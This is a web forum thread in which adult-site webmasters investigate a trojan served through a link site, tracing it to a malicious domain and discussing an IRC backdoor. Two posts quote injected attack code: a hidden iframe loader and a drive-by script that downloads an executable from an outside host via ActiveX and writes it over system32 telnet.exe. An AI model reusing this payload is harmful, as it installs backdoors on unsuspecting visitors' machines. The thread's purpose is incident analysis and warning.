|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
|
|
#1 |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
Trojan on Tommys Bookmarks?
Am I the only one who gets a Trojan report when I go to
http://www.tommys-bookmarks.com/pmpegs.shtml A pop-up is loading and I can't close it anymore. I have to completely shut down IE. This is what McAfee reports:
__________________
![]() The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa |
|
|
|
|
|
#2 |
|
Join Date: Nov 2002
Posts: 2,174
|
...
__________________
|
|
|
|
|
|
#3 |
|
HAL 9000
Industry Role:
Join Date: May 2001
Posts: 34,515
|
norton gives me trojan too
you'll better contact him since it seems his server got hacked. |
|
|
|
|
|
#4 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
Tommy is aware of this and is working like a madman to try to find the source. This one isn't very obvious. Where are you guys connecting from? It might be geo.
Alex |
|
|
|
|
|
#5 |
|
Confirmed User
Industry Role:
Join Date: Jan 2002
Location: AZ
Posts: 6,446
|
i get a popup that is blocked by sp2
from usa |
|
|
|
|
|
#6 |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
Me from the Netherlands
It seems like this trojan only shows up the first time you visit the page. Only after I remove all my cookies it shows up again!
__________________
![]() The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa |
|
|
|
|
|
#7 |
|
HAL 9000
Industry Role:
Join Date: May 2001
Posts: 34,515
|
Hi Alex, connecting from Greece
|
|
|
|
|
|
#8 |
|
GFY HALL OF FAME DAMMIT!!!
Join Date: Oct 2003
Posts: 58,202
|
Hmm, I didn't get any alerts. Canada.
|
|
|
|
|
|
#9 |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
It's loading from: http://www.zerosexxx.com/fnp/md.htm
Registrant: roxy 45 av bordeaux paris, paris 75000 US Registrar: DOTSTER Domain Name: ZEROSEXXX.COM Created on: 29-MAY-02 Expires on: 29-MAY-05 Last Updated on: 04-MAY-04 Administrative Contact: dove, sebring [email protected] roxy 45 av bordeaux paris, paris 75000 US 0125259785 0124249874 Technical Contact: dove, sebring [email protected] roxy 45 av bordeaux paris, paris 75000 US 0125259785 0124249874 Domain servers in listed order: NS1.CANDIDHOSTING.COM NS2.CANDIDHOSTING.COM
__________________
![]() The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa |
|
|
|
|
|
#10 |
|
Join Date: Nov 2002
Posts: 2,174
|
hahahahahahahaha language=j a v a s c r i p t> var bname=navigator.appName; if (bname = = 'Microsoft Internet Explorer') document.write('<iframe src="http://www.zerosexxx.com/fnp/console.htm" width=1 height=1 st yle="position :absolute; visibility: hidden"></iframe>');}</hahahahahahahaha
if you have a cookie set it vanishes
__________________
|
|
|
|
|
|
#11 |
|
HAL 9000
Industry Role:
Join Date: May 2001
Posts: 34,515
|
also same whois under:
dont click them all have viruses www.Clamide-galleries.com www.Clito57.com www.Fatasshole.com www.Fucks-pussy.com www.Hardclito.com www.Monsteract.com www.Pornfree-gals.com www.Ustimerz.com www.Zerosexxx.com |
|
|
|
|
|
#12 |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
What does it do exactly?
var downloadurl="http://www.zerosexxx.com/fnp/hp.exe?3"; if(navigator.appVersion.hahahahahahaha("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe"; if(navigator.appVersion.hahahahahahaha("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe"; payloadURL = downloadurl; var x = new ActiveXObject("Microsoft.XMLHTTP"); xhahahahahaha("GET",payloadURL,0); x.Send(); function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; } var s = new ActiveXObject(bla()); s.Mode = 3; s.Type = 1; shahahahahaha(); s.Write(x.responseBody); s.SaveToFile(savetopath,2); location.href = "telnet://"; Secret dialer ?
__________________
![]() The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa |
|
|
|
|
|
#13 | |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
Quote:
I clicked the first link. Holy fuck. McAfee kept reporting and reporting ![]()
__________________
![]() The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa |
|
|
|
|
|
|
#14 | |
|
Join Date: Nov 2002
Posts: 2,174
|
Quote:
__________________
|
|
|
|
|
|
|
#15 |
|
HAL 9000
Industry Role:
Join Date: May 2001
Posts: 34,515
|
it's not a dialer
the trojan downloads a backdoor file with the name telnet and it connects on an IRC server from what I read on a security forum. |
|
|
|
|
|
#16 |
|
Confirmed User
Join Date: Oct 2001
Location: Still lost
Posts: 5,112
|
Everyone has a price.
Im sure he is making good money off that. I love the: Oh I dunno where its from excuse. |
|
|
|
|
|
#17 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
Za Ha, you are a funny shit. Tommy is one VERY good egg in this business. Trust me, he is pulling his hair out over this one. His entire reputation is on the line. Nobody would be stupid enough to blow a business almost 10 years old an obviously illegal hack.
That is the 4th TGP / link site that I have seen hacked in the last 2 weeks. The fucking assholes of the world are really pushing it. Alex |
|
|
|
|
|
#18 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
Soul Rebel, that sort of behavior is similar to "egg drop" that would be on a unix box - it allows a person remotely to trigger a Denial of Service attack from many machines remotely only by entering a key phrase into an IRC chatroom.
It can also trigger other things, such as the downloading to a specific email address of personal info from the machine, email address lists, or any other informaiton located on the system infected. It would also allow for the installation of additional software without the end user's knowledge, such as a key logger or password trapper. This is a VERY powerful hack, not script kiddie stuff. Even reading the symantic website, you will see a certain amount of respect for the level of BS that went into making this sort of hack work. It's pros... not amateurs - and it's dangerous. Alex |
|
|
|
|
|
#19 | ||
|
Join Date: Nov 2002
Posts: 2,174
|
Quote:
Quote:
__________________
|
||
|
|
|
|
|
#20 |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
Alex, who are you exactly?
I have sent Tommy an email, because I'm trading with him. please make sure that he is getting back to me about this issue. Thanks Oh and I'm pretty sure Za Ha is wrong. I can't believe that Tommy would ever do this. Only thing is that I have really no clue how this shit can load from his site. I have checked my own computer for any spyware shit and are very confident that there is nothing installed. All this traffic stealing is getting out of hand. 2% of my own traffic is getting stolen. This is my main issue to solve the coming months.
__________________
![]() The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa |
|
|
|
|
|
#21 |
|
HAL 9000
Industry Role:
Join Date: May 2001
Posts: 34,515
|
No doubt Tommy didn't do that.
more about it here http://216.239.59.104/search?q=cache...22s.SaveToFile(savetopath,2)%3B+%22&hl=en Alex,i'm mailing you a possible valid US address of the domain owner. |
|
|
|
|
|
#22 |
|
Confirmed User
Industry Role:
Join Date: Jul 2002
Location: Ottawa, Canada
Posts: 1,447
|
FreeOnes
Tommy is aware of it. He actually received an email from a surfer is how he first found out and like Alex said is trying to figure out exactly how it is all happening. Alex? He's been in the biz a long long time. Runs several link sites and of course knows Tommy and has for years.
__________________
Fcuk Cash - Backroom Casting Couch, ExCoGi, BlackAmbush DarkReach Cash - Top Pornstars & Sites Skype: robmurray999 Email: rob-at-paysitemanagers.com |
|
|
|
|
|
#23 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
Freeones, just another link site owner... nothing serious! Trust me, tommy has his hands full getting rid of this one.
Microsoft link on the subject: http://www.microsoft.com/security/in...load_ject.mspx You can have the "how to" pf the exploi t here. it really does require some interesting timing to trigger properly! http://www.securiteam.com/securityre...HP0120D5W.html Nastyking, eggdrop is key because it puts the infected computer in connection with an IRC server without permission, and listens for commands. This is the first step of a "multi homed" denial of service attack or other malicious behavior commanded remotely. It's hack, pure and simple. Alex |
|
|
|
|
|
#24 | |
|
Too lazy to set a custom title
Industry Role:
Join Date: May 2004
Location: West Coast, Canada.
Posts: 10,217
|
Quote:
Thanks for the info though, I need to add some of that into my DNS/Registrar checker for traffic trades and gallery submitters. |
|
|
|
|
|
|
#25 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
soul_rebel, didn't get email, can send to rawalex hotmail please....?
Alex |
|
|
|
|
|
#26 |
|
HAL 9000
Industry Role:
Join Date: May 2001
Posts: 34,515
|
Alex, that's where i sent it. Any other email? Although I just noticed the domain appeared for a period to an expired domain list and probably the address points to wrong person.
|
|
|
|
|
|
#27 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
Okay, I got it. That info is useful mostly because it tipped me off to look at something else (see email) that might give a clue or two.
Interesting. Alex |
|
|
|
|
|
#28 |
|
Confirmed User
Industry Role:
Join Date: Aug 2001
Location: Beach
Posts: 5,282
|
This is very odd I see Candid Hosting in this thread, the same thing happened to my TGP which is a good size. This is exactly why I switched from Candid Hosting last month because my site was loading trojan's all the sudden several times over a 2 week period. None of the support team could find anything that was causing someone to change my site. It hasn't happened since I moved from Candid Hosting to a new sever over a month ago.
|
|
|
|
|
|
#29 | |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
Quote:
I hate them all ![]() |
|
|
|
|
|
|
#30 |
|
Confirmed User
Join Date: Feb 2003
Posts: 2,970
|
It seems that the problem is fixed now.
|
|
|
|
|
|
#31 | |
|
Confirmed User
Join Date: Aug 2002
Location: The Netherlands, Rotterdam
Posts: 8,965
|
Quote:
|
|
|
|
|
|
|
#32 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
Cleaning up after on of these things takes some time. Tommy is re-arranging the furniture and looking for them little bugs hiding in the corners. Let's just say he has NOT had a nice labor day weekend off.
Things should be 100% normal again in a day or so. Alex |
|
|
|
|
|
#33 |
|
Confirmed User
Join Date: Jul 2001
Location: The Netherlands
Posts: 3,400
|
Alex, why I didn't hear back from Tommy after 2 emails?
I really expect a reply. 2% of my traffic is stolen everyday by these kind of fucking trojan shit. Everybody who is suspicious gets blacklisted from now on. I wouldn't expect Tommy would ever put this on his site, but I need a good explanation for it. If I don't get replies on my emails you make yourself suspicious no matter who you are.
__________________
![]() The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa |
|
|
|
|
|
#34 |
|
Registered User
Join Date: Sep 2004
Posts: 9
|
Hi Maurice
you were told the site was hacked. we dont trade traffic, so after that its really none of your buisness. I think your emails and posts have been a little rude I anwsered your emails twice, I said I would let you know as soon as servint had some info for me if you want some information you should ask nicely, not like this we are hosted at the same company, the same sales person handles our accounts, if you really wanted to know what happened you could just email servint and ask them |
|
|
|
|
|
#35 |
|
Confirmed User
Join Date: Oct 2003
Location: Port St. Lucie, Florida
Posts: 5,162
|
owned
|
|
|
|
|
|
#36 |
|
Confirmed User
Join Date: Sep 2001
Location: Europe
Posts: 2,218
|
tommy is a good guy
|
|
|
|
|
|
#37 |
|
Confirmed User
Join Date: Jun 2004
Posts: 2,049
|
Man, people who would even think Tommy or Cosis there would ever load shit like this on purpose need to get a grip.. seriously..
It is interesting to note that 1 hosting company was/is hosting both sites when the problem popped up at first. I bet they'd like to know that to see if they have a backdoor open somewhere. |
|
|
|
|
|
#38 |
|
Confirmed User
Join Date: Mar 2004
Location: --------Europe-------
Posts: 5,725
|
well I use opera so all popups are blocked anyways
__________________
ICQ: 52410619 |
|
|
|